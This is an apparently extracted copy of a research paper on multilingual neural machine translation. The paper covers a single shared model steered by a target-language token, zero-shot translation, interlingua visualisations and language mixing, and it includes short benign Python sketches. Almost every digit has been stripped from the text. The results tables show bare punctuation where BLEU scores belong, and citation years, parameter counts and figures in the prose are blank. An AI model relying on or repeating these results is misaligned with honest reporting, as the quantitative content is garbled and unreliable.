from and to several languages. neural machine translation (nmt) (kalchbren- ner and blunsom, ) was shown to be a promis- ing end-to-end learning approach in sutskever et al. ( ); bahdanau et al. ( ); cho et al. ( ) and was quickly extended to multilingual machine translation in various ways. an early attempt is the work in dong et al., ( ), where the authors modify an attention-based encoder- decoder approach to perform multilingual nmt by adding a separate decoder and attention mechanism for each target language. in luong et al., ( a) multilingual training in a multitask learning setting is described. this model is also an encoder-decoder network, in this case without an attention mechanism. 
to make proper use of multilingual data, they extend their model with multiple encoders and decoders, one for each supported source and target language. in caglayan et al., ( ) the authors incorporate multiple modalities other than text into the encoder- decoder framework. several other approaches have been proposed for multilingual training, especially for low-resource lan- guage pairs. for instance, in zoph and knight ( ) a form of multi-source translation was proposed where the model has multiple different encoders and different attention mechanisms for each source lan- guage. however, this work requires the presence of a multi-way parallel corpus between all the languages involved, which is difficult to obtain in practice. most closely related to our approach is firat et al., ( a) in which the authors propose multi-way multilingual nmt using a single shared attention mechanism but multiple encoders/decoders for each source/target language. recently in lee et al., ( ) a cnn- based character-level encoder was proposed which is shared across multiple source languages. however, this approach can only perform translations into a single target language. our approach is related to the multitask learning framework (caruana, ). despite its promise, this framework has seen limited practical success in real world applications. in speech recognition, there have been many successful reports of modeling multiple languages using a single model ( (schultz and kirch- hoff, ) for an extensive reference and references therein). multilingual language processing has also shown to be successful in domains other than transla- tion (gillick et al., ; tsvetkov et al., ). there have been other approaches similar to ours in spirit, but used for very different purposes. in sen- nrich et al.,( a), the nmt framework has been extended to control the politeness level of the target translation by adding a special token to the source sentence. the same idea was used in yamagishi et al., ( ) to add the distinction between ‘active’ and ‘passive’ tense to the generated target sentence. our method has an additional benefit not seen in other systems: it gives the system the ability to per- form zero-shot translation, meaning the system can translate from a source language to a target language without having seen explicit examples from this spe- cific language pair during training. zero-shot trans- lation was the direct goal of firat et al., ( c). although they were not able to achieve this direct goal, they were able to do what they call “zero- resource” translation by using their pre-trained multi- way multilingual model and later fine-tuning it with pseudo-parallel data generated by the model. it should be noted that the difference between “zero- shot” and “zero-resource” translation is the additional fine-tuning step which is required in the latter ap- proach. to the best of our knowledge, our work is the first to validate the use of true multilingual translation using a single encoder-decoder model, and is inci- dentally also already used in a production setting. it is also the first work to demonstrate the possibil- ity of zero-shot translation, a successful example of transfer learning in machine translation, without any additional steps. system architecture the multilingual model architecture is identical to google’s neural machine translation (gnmt) sys- tem (wu et al., ) (with the optional addition of direct connections between encoder and decoder lay- ers which we have used for some of our experiments). 
to be able to make use of multilingual data within a single system, we propose one simple modification to the input data, which is to introduce an artificial token at the beginning of the input sentence to indi- cate the target language the model should translate to. for instance, consider the following en→es pair of sentences: how are you? -> ¿cómo estás? it will be modified to: < es> how are you? -> ¿cómo estás? to indicate that spanish is the target language. note that we don’t specify the source language – the model will learn this automatically. after adding the token to the input data, we train the model with all multilingual data consisting of multiple language pairs at once, possibly after over- or undersampling some of the data to adjust for the relative ratio of the language data available. to ad- dress the issue of translation of unknown words and to limit the vocabulary for computational efficiency, we use a shared wordpiece model (schuster and nakajima, ) across all the source and target data used for training, usually with , word pieces. the segmentation algorithm used here is very similar (with small differences) to byte-pair-encoding (bpe) which was described in gage ( ) and was also used in sennrich et al., ( b) for machine transla- tion. all training is carried out similar to (wu et al., ) and implemented in tensorflow (abadi and et al., ). in summary, this approach is the simplest among the alternatives that we are aware of. during training and inference, we only need to add one additional token to each sentence of the source data to specify the desired target language. experiments and results in this section, we apply our proposed method to train multilingual models in several different configu- rations. since we can have models with either single or multiple source/target languages we test three in- teresting cases for mapping languages: ) many to one, ) one to many, and ) many to many. as al- ready discussed in section , other models have been used to explore some of these cases already, but for completeness we apply our technique to these inter- esting use cases again to give a full picture of the effectiveness of our approach. we will also show results and discuss benefits of bringing together many (un)related languages in a single large-scale model trained on production data. finally, we will present our findings on zero-shot translation where the model learns to translate be- tween pairs of languages for which no explicit par- allel examples existed in the training data, and show results of experiments where adding additional data improves zero-shot translation quality further. . datasets, training protocols and evaluation metrics for wmt, we train our models on the wmt’ en→fr and the wmt’ en→de datasets. in both cases, we use newstest as the test sets to be able to compare against previous work (luong et al., c; sébastien et al., ; zhou et al., ; wu et al., ). for wmt fr→en and de→en we use newstest and newstest as test sets. de- spite training on wmt’ data, which is somewhat smaller than wmt’ , we test our de→en model on newstest , similar to luong et al., ( b). the combination of newstest and newstest is used as the development set. in addition to wmt, we also evaluate the multilin- gual approach on some google-internal large-scale production datasets representing a wide spectrum of languages with very distinct linguistic properties: en↔japanese(ja), en↔korean(ko), en↔es, and en↔pt. 
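the data modification just described can be made concrete with a short preprocessing sketch. it is only an illustration: the exact token spelling (written here as "<2es>" for the spanish-target token shown above), the function names, and the corpus handling are assumptions of this example rather than details taken from the actual pipeline.

```python
def add_target_token(source_sentence: str, target_lang: str) -> str:
    """prepend an artificial target-language token to the source sentence.

    the "<2xx>" spelling is illustrative; any reserved symbol that the shared
    wordpiece vocabulary keeps as a single token would serve the same purpose.
    """
    return f"<2{target_lang}> {source_sentence}"


def prepare_examples(pairs, target_lang):
    """turn (source, target) sentence pairs of one language pair into training
    examples for the shared multilingual model; the source language is never
    marked, the model is left to infer it."""
    for src, tgt in pairs:
        yield add_target_token(src, target_lang), tgt


# an en->es pair becomes ("<2es> how are you?", "¿cómo estás?")
print(list(prepare_examples([("how are you?", "¿cómo estás?")], "es")))
```

the same preprocessing is applied to every pair before the shared wordpiece model is trained, for the wmt corpora as well as the production corpora (en↔ja, en↔ko, en↔es, en↔pt) listed above.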
these datasets are two to three orders of magnitude larger than the wmt datasets. our training protocols are mostly identical to those described in wu et al., ( ). we find that some multilingual models take a little more time to train than single language pair models, likely because each language pair is seen only for a fraction of the train- ing process. we use larger batch sizes with a slightly higher initial learning rate to speed up the conver- gence of these models. we evaluate our models using the standard bleu score metric and to make our results comparable to previous work (sutskever et al., ; luong et al., c; zhou et al., ; wu et al., ), we report tokenized bleu score as computed by the multi-bleu.pl script, which can be downloaded from the public implementation of moses. to test the influence of varying amounts of train- ing data per language pair we explore two strategies when building multilingual models: a) where we oversample the data from all language pairs to be of the same size as the largest language pair, and b) where we mix the data as is without any change. the wordpiece model training is done after the optional oversampling taking into account all the changed data ratios. for the wmt models we report results using both of these strategies. for the production models, we always balance the data such that the ratios are equal. one benefit of the way we share all the components of the model is that the mini-batches can contain data from different language pairs during training and in- ference, which are typically just random samples from the final training and test data distributions. this is a simple way of preventing “catastrophic forgetting” - tendency for knowledge of previously http://www.statmt.org/moses/ learned task(s) (e.g. language pair a) to be abruptly forgotten as information relevant to the current task (e.g. language pair b) is incorporated (french, ). other approaches to multilingual translation require complex update scheduling mechanisms to prevent this effect (firat et al., b). . many to one in this section we explore having multiple source lan- guages and a single target language — the simplest way of combining language pairs. since there is only a single target language no additional source token is required. we perform three sets of experiments: • the first set of experiments is on the wmt datasets, where de→en and fr→en are com- bined to train a multilingual model. our base- lines are two single language pair models: de→en and fr→en trained independently. we perform these experiments once with oversam- pling and once without. • the second set of experiments is on production data where we combine ja→en and ko→en, with oversampling. the baselines are two single language pair models trained independently. • finally, the third set of experiments is on pro- duction data where we combine es→en and pt→en, with oversampling. the baselines are again two single language pair models trained independently. all of the multilingual and single language pair mod- els have the same total number of parameters as the baseline nmt models trained on a single language pair (using nodes, lstm layers and a shared wordpiece model vocabulary of k, a total of m parameters per model). 
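the oversampling strategy mentioned above (strategy a) can be sketched as follows. this is a simplified reading that assumes the corpora fit in memory and that plain duplication of examples is an acceptable way to oversample; it is not a description of the production data pipeline.

```python
import random

def oversample_to_largest(corpora):
    """balance several parallel corpora by oversampling the smaller ones.

    corpora: dict mapping a language-pair name to a list of (src, tgt) pairs.
    returns one mixed list in which every language pair contributes roughly
    as many examples as the largest corpus.
    """
    target_size = max(len(pairs) for pairs in corpora.values())
    mixed = []
    for pairs in corpora.values():
        mixed.extend(pairs)
        extra = target_size - len(pairs)
        if extra > 0:
            # duplicate randomly chosen examples from the smaller corpus
            mixed.extend(random.choices(pairs, k=extra))
    random.shuffle(mixed)  # mini-batches are then plain random samples
    return mixed
```

the shared wordpiece model is then trained on whichever mixture is chosen, and, as stated above, every model in these experiments is given the same fixed parameter budget as a single language pair baseline.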
a side effect of this equal choice of parameters is that it is presumably unfair to the multilingual models as the number of parameters available per language pair is reduced by a factor of n compared to the single language pair models, if n is the number of language pairs combined in the multilingual model. the multilingual model also has to handle the combined vocabulary of all the single models. we chose to keep the number of parameters constant for all models to simplify experimentation. we relax this constraint for some of the large-scale experiments shown further below. table : many to one: bleu scores on for single lan- guage pair and multilingual models. ?: no oversampling model single multi diff wmt de→en . . + . wmt fr→en . . + . wmt de→en? . . + . wmt fr→en? . . + . prod ja→en . . + . prod ko→en . . + . prod es→en . . + . prod pt→en . . + . the results are presented in table . for all ex- periments the multilingual models outperform the baseline single systems despite the above mentioned disadvantage with respect to the number of param- eters available per language pair. one possible hy- pothesis explaining the gains is that the model has been shown more english data on the target side, and that the source languages belong to the same language families, so the model has learned useful generalizations. for the wmt experiments, we obtain a maximum gain of + . bleu for fr→en. note that the re- sults on both the wmt test sets are better than other published state-of-the-art results for a single model, to the best of our knowledge. . one to many in this section, we explore the application of our method when there is a single source language and multiple target languages. here we need to prepend the input with an additional token to specify the target language. we perform three sets of experiments very similar to the previous section. table summarizes the results when performing translations into multiple target languages. we see that the multilingual models are comparable to, and in some cases outperform, the baselines, but not al- ways. we obtain a large gain of + . bleu for en→es. unlike the previous set of results, there are less significant gains in this setting. this is perhaps due to the fact that the decoder has a more difficult time translating into multiple target languages which may even have different scripts, which are combined into a single shared wordpiece vocabulary. note that even for languages with entirely different scripts (e.g., korean and japanese) there is significant overlap in wordpieces when real data is used, as often numbers, dates, names, websites, punctuation etc. are actually using a shared script (ascii). table : one to many: bleu scores for single language pair and multilingual models. ?: no oversampling model single multi diff wmt en→de . . + . wmt en→fr . . - . wmt en→de? . . - . wmt en→fr? . . - . prod en→ja . . + . prod en→ko . . - . prod en→es . . + . prod en→pt . . + . we observe that oversampling helps the smaller language pair (en→de) at the cost of lower quality for the larger language pair (en→fr). the model without oversampling achieves better results on the larger language compared to the smaller one as ex- pected. we also find that this effect is more prominent on smaller datasets (wmt) and much less so on our much larger production datasets. . many to many in this section, we report on experiments when there are multiple source languages and multiple target languages within a single model — the most difficult setup. 
since multiple target languages are given, the input needs to be prepended with the target language token as above. the results are presented in table . we see that the multilingual production models with the same model size and vocabulary size as the single language models are quite close to the baselines – the average relative loss in bleu score across all experiments is only approximately . %. although there are some significant losses in qual- ity from training many languages jointly using a model with the same total number of parameters as the single language pair models, these models re- duce the total complexity involved in training and productionization. . large-scale experiments this section shows the result of combining produc- tion language pairs having a total of b parameters ( m per single model) into a single multilingual table : many to many: bleu scores for single language pair and multilingual models. ?: no oversampling model single multi diff wmt en→de . . - . wmt en→fr . . - . wmt de→en . . - . wmt fr→en . . - . wmt en→de? . . - . wmt en→fr? . . - . wmt de→en? . . - . wmt fr→en? . . + . prod en→ja . . - . prod en→ko . . - . prod ja→en . . - . prod ko→en . . - . prod en→es . . + . prod en→pt . . - . prod es→en . . - . prod pt→en . . - . model. a range of multilingual models were trained, starting from the same size as a single language pair model with m parameters ( nodes) up to m parameters ( nodes). as above, the input needs to be prepended with the target language to- ken. we oversample the examples from the smaller language pairs to balance the data as explained above. the results for single language pair models ver- sus multilingual models with increasing numbers of parameters are summarized in table . we find that the multilingual models are on average worse than the single models (about . % to . % relative de- pending on size, however, some actually get better) and as expected the average difference gets smaller when going to larger multilingual models. it should be noted that the largest multilingual model we have trained has still about five times less parameters than the combined single models. the multilingual model also requires only roughly / -th of the training time (or computing resources) to converge compared to the combined single models (total training time for all our models is still in the order of weeks). another important point is that since we only train for a little longer than a standard single model, the individual language pairs can see as little as / -th of the data in comparison to their single language pair models but still produce satisfactory results. in summary, multilingual nmt enables us to table : large-scale experiments: bleu scores for single language pair and multilingual models. model single multi multi multi multi #nodes #params b m m m m en→ja . . . . . en→ko . . . . . ja→en . . . . . ko→en . . . . . en→es . . . . . en→pt . . . . . es→en . . . . . pt→en . . . . . en→de . . . . . en→fr . . . . . de→en . . . . . fr→en . . . . . ave diff - - . - . - . - . vs single - - . % - . % - . % - . % group languages with little loss in quality while hav- ing the benefits of better training efficiency, smaller number of models, and easier productionization. . zero-shot translation the most straight-forward approach of translating between languages where no or little parallel data is available is to use explicit bridging, meaning to translate to an intermediate language first and then to translate to the desired target language. 
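for reference, explicit bridging amounts to two chained invocations of a translation model. the `translate` callable and the default pivot language below are assumptions of this sketch, not an interface provided by the system described here.

```python
def bridged_translate(sentence, target_lang, translate, pivot_lang="en"):
    """explicit bridging: translate into a pivot language first, then from
    the pivot into the desired target language.

    translate(sentence, target_lang) stands for a trained nmt model invoked
    with a target-language token as described earlier; it is an assumed
    interface, not something provided here.
    """
    intermediate = translate(sentence, pivot_lang)   # e.g. pt -> en
    return translate(intermediate, target_lang)      # e.g. en -> es
```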
the in- termediate language is often english as xx→en and en→yy data is more readily available. the two po- tential disadvantages of this approach are: a) total translation time doubles, b) the potential loss of qual- ity by translating to/from the intermediate language. an interesting benefit of our approach is that it al- lows to perform directly implicit bridging (zero-shot translation) between a language pair for which no explicit parallel training data has been seen without any modification to the model. obviously, the model will only be able to do zero-shot translation between languages it has seen individually as source and tar- get languages during training at some point, not for entirely new ones. to demonstrate this we will use two multilingual models — a model trained with examples from two different language pairs, pt→en and en→es (model ), and a model trained with examples from four dif- ferent language pairs, en↔pt and en↔es (model ). as with the previous multilingual models, both of these models perform comparable to or even slightly better than the baseline single models for the lan- guage pairs explicitly seen. additionally, we show that both of these models can generate reasonable quality pt→es translations (bleu scores above ) without ever having seen pt→es data during training. to our knowledge this is the first successful demon- stration of true multilingual zero-shot translation. table summarizes our results for the pt→es translation experiments. rows (a) and (b) show the performance of the phrase-based machine translation (pbmt) system and the nmt system through ex- plicit bridging (pt→en, then en→es). it can be seen that the nmt system outperforms the pbmt system by close to bleu points. for comparison, we also built a single nmt model on all available pt→es parallel sentences (see (c) in table ). table : portuguese→spanish bleu scores using various models. model zero-shot bleu (a) pbmt bridged no . (b) nmt bridged no . (c) nmt pt→es no . (d) model (pt→en, en→es) yes . (e) model (en↔{es, pt}) yes . (f) model + incremental training no . the most interesting observation is that both model and model can perform zero-shot trans- lation with reasonable quality (see (d) and (e)) com- pared to the initial expectation that this would not work at all. note that model outperforms model by close to bleu points although model was trained with four language pairs as opposed to with only two for model (with both models having the same number of total parameters). in this case the ad- dition of spanish on the source side and portuguese on the target side helps pt→es zero-shot translation (which is the opposite direction of where we would expect it to help). we believe that this unexpected effect is only possible because our shared architec- ture enables the model to learn a form of interlingua between all these languages. we explore this hypoth- esis in more detail in section . finally we incrementally train zero-shot model with a small amount of true pt→es parallel data (an order of magnitude less than table (c)) and obtain the best quality and half the decoding time compared to explicit bridging (table (b)). the resulting model cannot be called zero-shot anymore since some true parallel data has been used to improve it. overall this shows that the proposed approach of implicit bridging using zero-shot translation via multilingual models can serve as a good baseline for further in- cremental training with relatively small amounts of true parallel data of the zero-shot direction. 
this result is especially significant for non-english low- resource language pairs where it might be easier to obtain parallel data with english but much harder to obtain parallel data for language pairs where neither the source nor the target language is english. we explore the effect of using parallel data in more detail in section . . since portuguese and spanish are of the same lan- guage family, an interesting question is how well zero-shot translation works for less related languages. table shows the results for explicit and implicit bridging from spanish to japanese using the large- scale model from table – spanish and japanese can be regarded as quite unrelated. as expected zero- shot translation works worse than explicit bridging and the quality drops relatively more (roughly % drop in bleu score) than for the case of more re- lated languages as shown above. despite the quality drop, this proves that our approach enables zero-shot translation even between unrelated languages. table : spanish→japanese bleu scores for explicit and implicit bridging using the -language pair large-scale model from table . model bleu nmt es→ja explicitly bridged . nmt es→ja implicitly bridged . . effect of direct parallel data in this section, we explore two ways of leveraging available parallel data to improve zero-shot transla- tion quality, similar in spirit to what was reported in firat et al., ( c). for our multilingual architecture we consider: • incrementally training the multilingual model on the additional parallel data for the zero-shot directions. • training a new multilingual model with all avail- able parallel data mixed equally. for our experiments, we use a baseline model which we call “zero-shot” trained on a combined parallel corpus of english↔{belarusian(be), russian(ru), ukrainian(uk)}. we trained a second model on the above corpus together with additional ru↔{be, uk} data. we call this model “from-scratch”. both mod- els support four target languages, and are evaluated on our standard test sets. as done previously we oversample the data such that all language pairs are represented equally. finally, we take the best check- point of the “zero-shot” model, and run incremental training on a small portion of the data used to train the “from-scratch” model for a short period of time until convergence (in this case % of “zero-shot” model total training time). we call this model “incre- mental”. as can be seen from table , for the english↔x directions, all three models show comparable scores. on the ru↔{be, uk} directions, the “zero-shot” model already achieves relatively high bleu scores for all directions except one, without any explicit parallel data. this could be because these languages are linguistically related. in the “from-scratch” col- umn, we see that training a new model from scratch improves the zero-shot translation directions further. however, this strategy has a slightly negative effect on the en↔x directions because our oversampling strategy will reduce the frequency of the data from these directions. in the final column, we see that in- cremental training with direct parallel data recovers most of the bleu score difference between the first two columns on the zero-shot language pairs. in sum- mary, our shared architecture models the zero-shot language pairs quite well and hence enables us to easily improve their quality with a small amount of additional parallel data. 
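the recipe used for the "incremental" model above can be summarised in a short sketch. the checkpoint handling, the `load_model` and `train_steps` helpers, and the default extra-training fraction are all assumptions of the illustration; only the order of operations follows the description above: resume from the converged multilingual checkpoint and train briefly on a mixture that now includes the formerly zero-shot directions.

```python
def incremental_training(base_checkpoint, mixed_corpus, base_training_steps,
                         load_model, train_steps, extra_fraction=0.05):
    """continue training a converged multilingual model on a corpus that now
    also contains direct parallel data for the formerly zero-shot directions.

    base_checkpoint: best checkpoint of the "zero-shot" model.
    mixed_corpus: balanced examples covering the original pairs plus the new
        direct data (e.g. ru<->be, ru<->uk).
    load_model / train_steps: assumed training utilities, not from the paper.
    extra_fraction: additional training relative to the base run; the small
        default here is only a placeholder.
    """
    model = load_model(base_checkpoint)
    extra_steps = int(extra_fraction * base_training_steps)
    train_steps(model, mixed_corpus, num_steps=extra_steps)
    return model
```

training a new model on the enlarged mixture from random initialisation instead corresponds to the "from-scratch" column discussed above.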
visual analysis the results of this paper — that training a model across multiple languages can enhance performance at the individual language level, and that zero-shot translation can be effective — raise a number of ques- tions about how these tasks are handled inside the model. is the network learning some sort of shared representation, in which sentences with the same meaning are represented in similar ways regardless of language? does the model operate on zero-shot table : bleu scores for english↔{belarusian, russian, ukrainian} models. zero-shot from-scratch incremental en→be . . . en→ru . . . en→uk . . . be→en . . . ru→en . . . uk→en . . . be→ru . . . ru→be . . . ru→uk . . . uk→ru . . . translations in the same way as it treats language pairs it has been trained on? one way to study the representations used by the network is to look at the activations of the network during translation. a starting point for investigation is the set of context vectors, i.e., the sum of internal encoder states weighted by their attention probabili- ties per step (eq. ( ) in (bahdanau et al., )). a translation of a single sentence generates a se- quence of context vectors. in this context, our orig- inal questions about shared representation can be studied by looking at how the vector sequences of different sentences relate. we could then ask for ex- ample: do sentences cluster together depending on the source or target language? or instead do sen- tences with similar meanings cluster, regardless of language? we try to find answers to these questions by looking at lower-dimensional representations of internal embeddings of the network that humans can more easily interpret. . evidence for an interlingua several trained networks indeed show strong vi- sual evidence of a shared representation. for ex- ample, figure below was produced from a many- to-many model trained on four language pairs, english↔japanese and english↔korean. to visual- ize the model in action we began with a small corpus of triples of semantically identical cross-language phrases. that is, each triple contained phrases in en- glish, japanese and korean with the same underlying meaning. to compile these triples, we searched a ground-truth database for english sentences which were paired with both japanese and korean transla- tions. we then applied the trained model to translate each sentence of each triple into the two other possible lan- guages. performing this process yielded six new sen- tences based on each triple, for a total of ∗ = total translations with , steps corresponding to the same number of context vectors. since context vectors are high-dimensional, we use the tensorflow embedding projector to map them into more acces- sible d space via t-sne (maaten and hinton, ). in the following diagrams, each point represents a single decoding step during the translation process. points that represent steps for a given sentence are connected by line segments. figure shows a global view of all , context vectors. points produced from the same original sen- tence triple are all given the same (random) color. inspection of these clusters shows that each strand represents a single sentence, and clusters of strands generally represent a set of translations of the same underlying sentence, but with different source and target languages. at right are two close-ups: one of an individual cluster, still coloring based on membership in the same triple, and one where we have colored by source language. . 
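the visualisation procedure of this subsection can be approximated with off-the-shelf tooling. the sketch below assumes a decoder hook that exposes the per-step context vectors (the `translate_with_context` callable is hypothetical) and uses scikit-learn's t-sne as a stand-in for the tensorflow embedding projector; only the overall recipe, one context vector per decoding step projected to two dimensions, follows the text above.

```python
import numpy as np
from sklearn.manifold import TSNE  # stand-in for the tensorflow embedding projector

def collect_context_vectors(triples, translate_with_context):
    """for each group of semantically equivalent sentences, translate into the
    other languages of the group and keep every per-step context vector,
    remembering which group it came from so points can be coloured later."""
    vectors, group_ids = [], []
    for group_id, sentences in enumerate(triples):       # sentences: [(lang, text), ...]
        for src_lang, text in sentences:
            for tgt_lang in {lang for lang, _ in sentences} - {src_lang}:
                # hypothetical hook returning one context vector per decoder step
                _, ctx = translate_with_context(text, tgt_lang)
                vectors.extend(ctx)
                group_ids.extend([group_id] * len(ctx))
    return np.array(vectors), group_ids

def project_2d(vectors):
    """project the high-dimensional context vectors to 2-d for inspection."""
    return TSNE(n_components=2).fit_transform(vectors)
```

points that share a group id can then be drawn in one colour and connected in decoding order, which yields the strands and clusters described above.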
partially separated representations not all models show such clean semantic clustering. sometimes we observed joint embeddings in some regions of space coexisting with separate large clus- ters which contained many context vectors from just one language pair. for example, figure a shows a t-sne projection of context vectors from a model that was trained on portuguese→english (blue) and english→spanish (yellow) and performing zero-shot translation from portuguese→spanish (red). this projection shows semantically identical triples translated as de- scribed above, yielding total translations. the large red region on the left primarily contains zero- shot portuguese→spanish translations. in other words, for a significant number of sentences, the zero-shot translation has a different embedding than the two trained translation directions. on the other hand, some zero-shot translation vectors do seem to https://www.tensorflow.org/get_started/ embedding_viz figure : a t-sne projection of the embedding of semantically identical sentences translated across all possible directions, yielding a total of , steps (dots in the image), from the model trained on english↔japanese and english↔korean examples. (a) a bird’s-eye view of the embedding, coloring by the index of the semantic sentence. well-defined clusters each having a single color are apparent. (b) a zoomed in view of one of the clusters with the same coloring. all of the sentences within this cluster are translations of “the stratosphere extends from about km to about km in altitude.” (c) the same cluster colored by source language. all three source languages can be seen within this cluster. figure : (a) a bird’s-eye view of a t-sne projection of an embedding of the model trained on portuguese→english (blue) and english→spanish (yellow) examples with a portuguese→spanish zero-shot bridge (red). the large red region on the left primarily contains the zero-shot portuguese→spanish translations. (b) a scatter plot of bleu scores of zero-shot translations versus the average point-wise distance between the zero-shot translation and a non-bridged translation. the pearson correlation coefficient is − . . fall near the embeddings found in other languages, as on the large region on the right. it is natural to ask whether the large cluster of “sep- arated” zero-shot translations has any significance. a definitive answer requires further investigation, but in this case zero-shot translations in the separated area do tend to have lower bleu scores. figure b shows a plot of bleu scores of a zero- shot translation versus the average pointwise distance between it and the same translation from a trained language pair. an interesting area for future research is to find a more reliable correspondence between em- bedding geometry and model performance to predict the quality of a zero-shot translation during decoding by comparing it to the embedding of the translation through a trained language pair. mixing languages having a mechanism to translate from a random source language to a single chosen target language using an additional source token made us think about what happens when languages are mixed on the source or target side. in particular, we were interested in the following two experiments: ) can a multilin- gual model successfully handle multi-language in- put (code-switching) in the middle of a sentence?; ) what happens when a multilingual model is triggered with a linear mix of two target language tokens? . 
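the second question corresponds to the weighted target language selection experiment below and boils down to interpolating two token embeddings before decoding. the embedding lookup and the decoding interface are assumptions of this sketch.

```python
import numpy as np

def mixed_target_embedding(embedding_table, token_a, token_b, w):
    """linearly interpolate the embeddings of two target-language tokens,
    e.g. (1 - w) * <2ja> + w * <2ko>.

    embedding_table maps a token string to its embedding vector (assumed).
    """
    e_a = np.asarray(embedding_table[token_a])
    e_b = np.asarray(embedding_table[token_b])
    return (1.0 - w) * e_a + w * e_b

# sweeping w from 0 to 1 and decoding with the mixed embedding in the
# target-token position is the probe whose behaviour is reported below.
```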
source language code-switching here we show how multilingual models deal with source language code-switching – an example from a multilingual {ja,ko}→en model is below. mixing japanese and korean in the source produces in many cases correct english translations, showing that code- switching can be handled by this model, although no such code-switching samples were present in the training data. note that the model can effectively han- dle the different typographic scripts since the individ- ual characters/wordpieces are present in the shared vocabulary. • japanese: 私は東京大学の学生です。→ i am a student at tokyo university. • korean: 나는도쿄대학의학생입니다. → i am a student at tokyo university. • japanese/korean: 私は東京大学학생입니 다. → i am a student of tokyo university. interestingly, the mixed-language translation is slightly different from both single source language translations. . weighted target language selection here we test what happens when we mix target lan- guages. using a multilingual en→{ja, ko} model, we feed a linear combination ( −w)< ja>+w< ko> of the embedding vectors for “< ja>” and “< ko>”. clearly, for w = the model should produce japanese, for w = it should produce korean, but what happens in between? the model may produce some sort of intermediate language (“japarean”), but the results turn out to be less surprising. most of the time the output just switches from one language to another around w = . . in some cases, for intermediate values of w, the model switches languages mid-sentence. a possible explanation for this behavior is that the target language model, implicitly learned by the decoder lstm, may make it very hard to mix words from different languages, especially when they use different scripts. table shows an example of mixed target lan- guages (ja/ko), where we can observe an interesting transition in the script and grammar. at wko = . , the model translates the source sentence into a mix of japanese and korean. at wko = . , the sen- tence is translated into full korean, where all of the source words are captured, however, the ordering of the words is not natural. when wko is increased to . , the model starts to translate the source sentence into a korean sentence that sounds more natural. conclusion we present a simple solution to multilingual nmt. we show that we can train multilingual nmt mod- els that can be used to translate between a number of different languages using a single model where all parameters are shared, which as a positive side- effect also improves the translation quality of low- resource languages in the mix. we also show that zero-shot translation without explicit bridging is pos- sible, which is the first time to our knowledge that a the korean translation does not contain spaces and uses ‘。’ as punctuation symbol, and these are all artifacts of applying a japanese postprocessor. table : gradually mixing target languages ja/ko. wko i must be getting somewhere near the centre of the earth. . 私は地球の中心の近くにどこかに行っている に違いない。 . 私は地球の中心近くのどこかに着いているに 違いない。 . 私は地球の中心の近くのどこかになっている に違いない。 . 私は지구の中心의가까이에어딘가에도착하고있 어야한다。 . 나는지구의센터의가까이에어딘가에도착하고있 어야한다。 . 나는지구의중심근처어딘가에도착해야합니다。 . 나는어딘가지구의중심근처에도착해야합니다。 . 나는어딘가지구의중심근처에도착해야합니다。 form of true transfer learning has been shown to work for machine translation. to explicitly improve the zero-shot translation quality, we explore two ways of adding available parallel data and find that small additional amounts are sufficient to reach satisfac- tory results. 
in our largest experiment we merge language pairs into a single model and achieve only slightly lower translation quality as for the sin- gle language pair baselines despite the drastically reduced amount of modeling capacity per language in the multilingual model. visual interpretation of the results shows that these models learn a form of inter- lingua representation between all involved language pairs. the simple architecture makes it possible to mix languages on the source or target side to yield some interesting translation examples. our approach has been shown to work reliably in a google-scale production setting and enables us to scale to a large number of languages quickly. acknowledgements we would like to thank the entire google brain team and google translate team for their foundational contributions to this project. in particular, we thank junyoung chung for his insights on the topic and alex rudnick and otavio good for helpful sugges- tions. we would also like to thank the tacl action editor and the reviewers for their feedback. references martin abadi and paul barham et al. . tensorflow: a system for large-scale machine learning. in th usenix symposium on operating systems design and implementation (osdi ), pages – . dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in international conference on learning representations. ozan caglayan and walid aransa et al. . does mul- timodality help human and machine for translation and image captioning? in proceedings of the first confer- ence on machine translation, pages – , berlin, germany, august. association for computational lin- guistics. rich caruana. . multitask learning. in learning to learn, pages – . springer. kyunghyun cho, bart van merrienboer, Çaglar gülçehre, fethi bougares, holger schwenk, and yoshua ben- gio. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in conference on empirical methods in natural language processing. josep crego and jungi kim et al. . systran’s pure neural machine translation systems. arxiv preprint arxiv: . . daxiang dong, hua wu, wei he, dianhai yu, and haifeng wang. . multi-task learning for multiple language translation. in proceedings of the rd annual meeting of the association for computational linguistics, pages – . orhan firat, kyunghyun cho, and yoshua bengio. a. multi-way, multilingual neural machine translation with a shared attention mechanism. in the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, san diego california, usa, june - , , pages – . orhan firat, kyunghyun cho, baskaran sankaran, fatos t. yarman vural, and yoshua bengio. b. multi-way, multilingual neural machine translation. computer speech and language. orhan firat, baskaran sankaran, yaser al-onaizan, fatos t. yarman vural, and kyunghyun cho. c. zero-resource translation with multi-lingual neural ma- chine translation. in proceedings of the con- ference on empirical methods in natural language processing, pages – , austin, texas, november. association for computational linguistics. robert m french. . catastrophic forgetting in connectionist networks. trends in cognitive sciences, ( ): – . philip gage. . a new algorithm for data compression. c users journal, ( ): – , february. dan gillick, cliff brunk, oriol vinyals, and amarnag sub- ramanya. . multilingual language processing from bytes. 
in proceedings of the conference of the north american chapter of the association for compu- tational linguistics: human language technologies, pages – , san diego, california, june. associ- ation for computational linguistics. william john hutchins and harold l. somers. . an introduction to machine translation, volume . academic press london. nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in conference on em- pirical methods in natural language processing. jason lee, kyunghyun cho, and thomas hofmann. . fully character-level neural machine transla- tion without explicit segmentation. arxiv preprint arxiv: . . minh-thang luong, quoc v le, ilya sutskever, oriol vinyals, and lukasz kaiser. a. multi-task se- quence to sequence learning. in international confer- ence on learning representations. minh-thang luong, hieu pham, and christopher d. man- ning. b. effective approaches to attention-based neural machine translation. in conference on empiri- cal methods in natural language processing. minh-thang luong, ilya sutskever, quoc v le, oriol vinyals, and wojciech zaremba. c. addressing the rare word problem in neural machine translation. in proceedings of the rd annual meeting of the as- sociation for computational linguistics and the th international joint conference on natural language processing. laurens van der maaten and geoffrey hinton. . visualizing data using t-sne. journal of machine learning research, . richard h richens. . interlingual machine transla- tion. the computer journal, ( ): – . tanja schultz and katrin kirchhoff. . multilingual speech processing. elsevier academic press, amster- dam, boston, paris. mike schuster and kaisuke nakajima. . japanese and korean voice search. ieee international conference on acoustics, speech and signal process- ing. jean sébastien, cho kyunghyun, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in proceedings of the rd annual meeting of the association for com- putational linguistics and the th international joint conference on natural language 